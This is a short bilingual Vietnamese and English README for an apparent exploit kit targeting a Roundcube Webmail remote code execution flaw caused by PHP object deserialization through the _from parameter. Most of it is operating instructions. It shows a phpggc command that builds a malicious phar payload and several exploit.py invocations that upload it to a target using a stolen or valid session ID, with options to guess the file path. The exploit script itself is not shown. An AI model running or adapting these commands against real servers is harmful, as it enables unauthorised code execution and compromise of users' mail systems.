Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.## VIETNAMESE ##
- ## ✅ Tính năng: ##
>Hỗ trợ upload payload.phar
>Tự động đoán path nếu không biết chính xác
>Cho phép sử dụng phar:// path tùy chọn
>Có tùy chọn --upload-payload, --auto-path, --direct-path
- ## 🧪 Cách dùng: ##
- 1. Tạo payload:
>phpggc monolog/rce1 system 'id' -p phar -o payload.phar
- 2. Upload và khai thác tự động:
>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --auto-path
- 3. Upload và tự nhập path nếu biết chính xác đường dẫn :
>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --direct-path /var/www/html/temp/payload.phar
- 4. Không upload, chỉ khai thác:
>python3 exploit.py https://target.com SESSIONID --direct-path /var/www/html/temp/payload.phar
>✅ Bạn có thể thay SESSIONID bằng session hợp lệ của Roundcube.
## ENGLISH ##
- ## ✅ Features: ##
>Support uploading payload.phar
>Automatically guess the path if not exactly known
>Allow the use of phar:// path option
>There are options --upload-payload, --auto-path, --direct-path
- ## 🧪 How to use: ##
- 1. Create payload:
>phpggc monolog/rce1 system 'id' -p phar -o payload.phar
- 2. Upload and exploit automatically:
>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --auto-path
- 3. Upload and enter the path yourself if you know the exact path:
>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --direct-path /var/www/html/temp/payload.phar
- 4. Do not upload, just exploit:
>python3 exploit.py https://target.com SESSIONID --direct-path /var/www/html/temp/payload.phar
- ✅ You can replace SESSIONID with a valid Roundcube session.
[4.0K] /data/pocs/131efeaf7c7e5dc6b1423204503887427c2dd7ce
├── [2.7K] exploit.py
└── [1.7K] README.md
0 directories, 2 files